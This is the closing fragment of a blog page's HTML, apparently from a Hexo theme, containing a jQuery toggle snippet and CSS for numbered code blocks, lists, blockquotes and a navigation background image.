        $(".hide_box").fadeToggle();
    }
    
</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 2px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
</style>

<!--自定义样式设置-->
<style>
    
    .nav-right nav a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 2px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /*引用块样式*/
    
    .post .pjax article blockquote {
        padding: 10px 20px;
        background-color: white;
        border: none;
        border-left: 4px solid #42b983;
        border-right: 4px solid #42b983;
        border-radius: 10px;
    }
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.1;
        background: url("http://oy0tigw51.bkt.clouddn.com/201711210136_683.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    
</style>
</html>
